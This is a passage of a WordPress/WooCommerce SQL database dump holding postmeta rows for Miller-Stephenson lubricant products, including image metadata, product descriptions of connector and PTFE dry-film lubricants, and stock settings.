INSERT INTO `wp_postmeta` VALUES (16510, 1671, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4104;s:6:"height";i:2731;s:4:"file";s:33:"2016/09/connector-lubricant-2.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"connector-lubricant-2-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"connector-lubricant-2-800x532.jpg";s:5:"width";i:800;s:6:"height";i:532;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"connector-lubricant-2-768x511.jpg";s:5:"width";i:768;s:6:"height";i:511;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"connector-lubricant-2-1600x1065.jpg";s:5:"width";i:1600;s:6:"height";i:1065;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"connector-lubricant-2-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"connector-lubricant-2-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"connector-lubricant-2-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"connector-lubricant-2-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (16511, 1670, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (16512, 1670, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (16513, 1672, '_wp_attached_file', '2016/09/tribosys-connector-lubricant.jpg'); 
INSERT INTO `wp_postmeta` VALUES (16514, 1672, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3000;s:6:"height";i:2000;s:4:"file";s:40:"2016/09/tribosys-connector-lubricant.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:40:"tribosys-connector-lubricant-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:40:"tribosys-connector-lubricant-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:40:"tribosys-connector-lubricant-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:42:"tribosys-connector-lubricant-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:40:"tribosys-connector-lubricant-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:40:"tribosys-connector-lubricant-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:40:"tribosys-connector-lubricant-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:40:"tribosys-connector-lubricant-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (16515, 1673, '_edit_lock', '1481919985:2'); 
INSERT INTO `wp_postmeta` VALUES (16516, 1673, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (16517, 1674, '_wp_attached_file', '2016/09/connector-lubricant-tribosys.jpg'); 
INSERT INTO `wp_postmeta` VALUES (16518, 1674, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4108;s:6:"height";i:3116;s:4:"file";s:40:"2016/09/connector-lubricant-tribosys.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:40:"connector-lubricant-tribosys-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:40:"connector-lubricant-tribosys-800x607.jpg";s:5:"width";i:800;s:6:"height";i:607;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:40:"connector-lubricant-tribosys-768x583.jpg";s:5:"width";i:768;s:6:"height";i:583;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:42:"connector-lubricant-tribosys-1600x1214.jpg";s:5:"width";i:1600;s:6:"height";i:1214;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:40:"connector-lubricant-tribosys-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:40:"connector-lubricant-tribosys-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:40:"connector-lubricant-tribosys-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:40:"connector-lubricant-tribosys-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:2:"-1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (16519, 1673, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (16520, 1673, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (16521, 1673, '_thumbnail_id', '1674'); 
INSERT INTO `wp_postmeta` VALUES (16522, 1673, '312_default_editor', '<ul>\r\n 	<li>Reduces insertion forces</li>\r\n 	<li>Greatly increases mating cycles (especially important where high pin counts are involved)</li>\r\n 	<li>Extends connector life by preventing corrosion and galling</li>\r\n 	<li>Removes contaminates and oxides</li>\r\n 	<li>Forms no residue, even at high temperatures</li>\r\n 	<li>Is non-migrating-contains no silicones</li>\r\n 	<li>Available with a UV (ultraviolet) indicator</li>\r\n 	<li>No interference in electrical continuity</li>\r\n 	<li>Nonflammable</li>\r\n 	<li>RoHS compliant</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (16523, 1673, '1367_default_editor', '<strong>MS-124H </strong>(14 oz Aerosol)\r\n<strong>MS-126H </strong>(1 oz, 4 oz, 8 oz, Qt, Gal, 5G, 55G)'); 
INSERT INTO `wp_postmeta` VALUES (16524, 1673, '716_default_editor', '<ul>\r\n 	<li>Connectors</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (16525, 1673, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (16526, 1673, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (16527, 1673, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (16528, 1673, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (16529, 1673, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16530, 1673, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16531, 1673, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (16532, 1673, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16533, 1673, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (16534, 1673, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (16535, 1673, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (16536, 1673, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (16537, 1673, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (16538, 1673, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16539, 1673, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16540, 1673, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16541, 1673, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (16542, 1673, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (16543, 1673, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16544, 1673, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (16545, 1673, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16546, 1673, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16547, 1673, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (16548, 1673, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16549, 1673, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16550, 1673, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (16551, 1673, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16552, 1673, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16553, 1673, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (16554, 1673, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (16555, 1673, '_ywtm_content_tab_description', 'Cleans, lubricates and protects multi-pin connectors.'); 
INSERT INTO `wp_postmeta` VALUES (16556, 1673, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (16559, 1676, '_wp_attached_file', '2016/09/dryfilm-lubricant.jpg'); 
INSERT INTO `wp_postmeta` VALUES (16560, 1676, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3790;s:6:"height";i:2742;s:4:"file";s:29:"2016/09/dryfilm-lubricant.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:29:"dryfilm-lubricant-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:29:"dryfilm-lubricant-800x579.jpg";s:5:"width";i:800;s:6:"height";i:579;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:29:"dryfilm-lubricant-768x556.jpg";s:5:"width";i:768;s:6:"height";i:556;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:31:"dryfilm-lubricant-1600x1158.jpg";s:5:"width";i:1600;s:6:"height";i:1158;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:29:"dryfilm-lubricant-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:29:"dryfilm-lubricant-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:29:"dryfilm-lubricant-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:29:"dryfilm-lubricant-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (16561, 1677, '_edit_lock', '1496665223:3'); 
INSERT INTO `wp_postmeta` VALUES (16562, 1677, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (16563, 1678, '_wp_attached_file', '2016/09/ms-122ad-dry-film-lubricant.jpg'); 
INSERT INTO `wp_postmeta` VALUES (16564, 1678, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5760;s:6:"height";i:3840;s:4:"file";s:39:"2016/09/ms-122ad-dry-film-lubricant.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:39:"ms-122ad-dry-film-lubricant-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:39:"ms-122ad-dry-film-lubricant-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:39:"ms-122ad-dry-film-lubricant-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:41:"ms-122ad-dry-film-lubricant-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:39:"ms-122ad-dry-film-lubricant-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:39:"ms-122ad-dry-film-lubricant-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:39:"ms-122ad-dry-film-lubricant-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:39:"ms-122ad-dry-film-lubricant-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (16565, 1677, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (16566, 1677, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (16567, 1677, '_thumbnail_id', '1678'); 
INSERT INTO `wp_postmeta` VALUES (16568, 1677, '312_default_editor', 'Physical Properties\r\n<table width="456">\r\n<tbody>\r\n<tr>\r\n<td width="250">Primary Polymer</td>\r\n<td style="text-align: center;" width="206">Fluoropolymer</td>\r\n</tr>\r\n<tr>\r\n<td>Appearance</td>\r\n<td style="text-align: center;">White Particle</td>\r\n</tr>\r\n<tr>\r\n<td>Odor</td>\r\n<td style="text-align: center;">Slight</td>\r\n</tr>\r\n<tr>\r\n<td>Specific Gravity</td>\r\n<td style="text-align: center;">1.20 g/mL @ 25°C</td>\r\n</tr>\r\n<tr>\r\n<td>Ozone Depletion Potential</td>\r\n<td style="text-align: center;">0</td>\r\n</tr>\r\n<tr>\r\n<td>VOC</td>\r\n<td style="text-align: center;">84 g/l</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (16569, 1677, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (16570, 1677, '716_default_editor', '<strong>Release Agent Applications</strong>\r\n\r\nMS-122AD can be used to release the following materials with virtually no transfer of the release agent:\r\n\r\n&nbsp;\r\n<table style="height: 39px;" width="560">\r\n<tbody>\r\n<tr>\r\n<td width="140">•          Plastics</td>\r\n<td width="168">•          Rubbers</td>\r\n</tr>\r\n<tr>\r\n<td width="140">•          Resins</td>\r\n<td width="168">•          Phenolics</td>\r\n</tr>\r\n<tr>\r\n<td width="140">•          Acrylics</td>\r\n<td width="168">•          Polycarbonates</td>\r\n</tr>\r\n<tr>\r\n<td width="140">•          Urethanes</td>\r\n<td width="168">•          Polystyrene</td>\r\n</tr>\r\n<tr>\r\n<td width="140">•          Nylons</td>\r\n<td width="168">•          Elastomers</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<ul>\r\n<ul>Dry Lubricant Applications</ul>\r\n</ul>\r\n&nbsp;\r\n<ul>\r\n 	<li>Gears, drive belts and gaskets.</li>\r\n 	<li>Wire and cable.</li>\r\n 	<li>Thread, cord and rope.</li>\r\n 	<li>Chain drives.</li>\r\n 	<li>Metalworking, including extrusion, rolling, drawing and sizing.</li>\r\n 	<li>Machine parts and tools, including nuts, bolts, thread connections, locks, power saw blades and machine mechanisms.</li>\r\n 	<li>Hardware, including hinges, locks and catches, window guides, and guides on cabinet drawers</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (16571, 1677, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (16572, 1677, '317_default_editor', '<ul>\r\n 	<li>13.50 oz. Aerosol</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (16573, 1677, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (16574, 1677, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (16575, 1677, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16576, 1677, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16577, 1677, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (16578, 1677, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16579, 1677, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (16580, 1677, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (16581, 1677, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (16582, 1677, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (16583, 1677, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (16584, 1677, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16585, 1677, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16586, 1677, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16587, 1677, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (16588, 1677, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (16589, 1677, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16590, 1677, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (16591, 1677, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16592, 1677, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16593, 1677, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (16594, 1677, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16595, 1677, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16596, 1677, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (16597, 1677, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16598, 1677, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16599, 1677, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (16600, 1677, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (16601, 1677, '_ywtm_content_tab_description', 'Miller-Stephenson Release Agent/Dry Lubricant contains a suspension of low molecular weight polytetrafluoroethylene (PTFE) fluoropolymers – white, waxy particles of PTFE in an easy to apply form. The outstanding lubricity and low coefficient of friction of PTFE is perfect for use as a dry film lubricant and as a release agent in molding operations.\r\n\r\nMS-122AD is an excellent and economical universal release agent, highly effective when applied to rubber molds. Provide a very uniform coating. Our best dry lubricant, for all applications. It may be used on all surfaces, especially where there is metal to metal contact.'); 
INSERT INTO `wp_postmeta` VALUES (16602, 1677, '_product_image_gallery', '1733'); 
INSERT INTO `wp_postmeta` VALUES (16603, 1679, '_edit_lock', '1473953603:2'); 
INSERT INTO `wp_postmeta` VALUES (16604, 1679, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (16605, 1679, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (16606, 1679, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (16607, 1679, '_thumbnail_id', '1680'); 
INSERT INTO `wp_postmeta` VALUES (16608, 1679, '312_default_editor', '<ul>\r\n 	<li>Slippery, with outstanding lubricity (low coefficient of friction).</li>\r\n 	<li>Thermally stable (from cryogenic to 500ºF/260ºC).</li>\r\n 	<li>Nonflammable.</li>\r\n 	<li>Chemically inert.</li>\r\n 	<li>Insoluble.</li>\r\n 	<li>Non-migrating (contain no silicones).</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (16609, 1679, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (16610, 1679, '716_default_editor', '<ul>\r\n 	<li>Gears, drive belts and gaskets.</li>\r\n 	<li>Wire and cable.</li>\r\n 	<li>Thread, cord and rope.</li>\r\n 	<li>Chain drives.</li>\r\n 	<li>Metalworking, including extrusion, rolling, drawing and sizing.</li>\r\n 	<li>Machine parts and tools, including nuts, bolts, thread connections, locks, power saw blades and machine mechanisms.</li>\r\n 	<li>Hardware, including hinges, locks and catches, window guides, and guides on cabinet drawers</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (16611, 1679, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (16612, 1679, '317_default_editor', '<ul>\r\n 	<li>12 oz. Aerosol</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (16613, 1679, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (16614, 1679, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16615, 1679, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16616, 1679, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (16617, 1679, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16618, 1679, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (16619, 1679, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (16620, 1679, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (16621, 1679, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (16622, 1679, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16623, 1679, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16624, 1679, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16625, 1679, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (16626, 1679, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (16627, 1679, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16628, 1679, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (16629, 1679, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16630, 1679, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16631, 1679, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (16632, 1679, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16633, 1679, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16634, 1679, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (16635, 1679, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16636, 1679, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16637, 1679, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (16638, 1679, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (16639, 1679, '_ywtm_content_tab_description', 'Miller-Stephenson Release Agent/Dry Lubricant contains a suspension of low molecular weight polytetrafluoroethylene (PTFE) fluoropolymers – white, waxy particles of PTFE in an easy to apply form. The outstanding lubricity and low coefficient of friction of PTFE is perfect for use as a dry film lubricant and as a release agent in molding operations.\r\n\r\nMS-122AD is an excellent and economical universal release agent, highly effective when applied to rubber molds. Provide a very uniform coating. Our best dry lubricant, for all applications. It may be used on all surfaces, especially where there is metal to metal contact.'); 
INSERT INTO `wp_postmeta` VALUES (16640, 1679, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (16666, 1680, '_wp_attached_file', '2016/09/ms-122adl-dry-film-lubricant.jpg'); 
INSERT INTO `wp_postmeta` VALUES (16667, 1680, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:40:"2016/09/ms-122adl-dry-film-lubricant.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:40:"ms-122adl-dry-film-lubricant-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:40:"ms-122adl-dry-film-lubricant-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:40:"ms-122adl-dry-film-lubricant-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:42:"ms-122adl-dry-film-lubricant-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:40:"ms-122adl-dry-film-lubricant-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:40:"ms-122adl-dry-film-lubricant-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:40:"ms-122adl-dry-film-lubricant-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:40:"ms-122adl-dry-film-lubricant-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s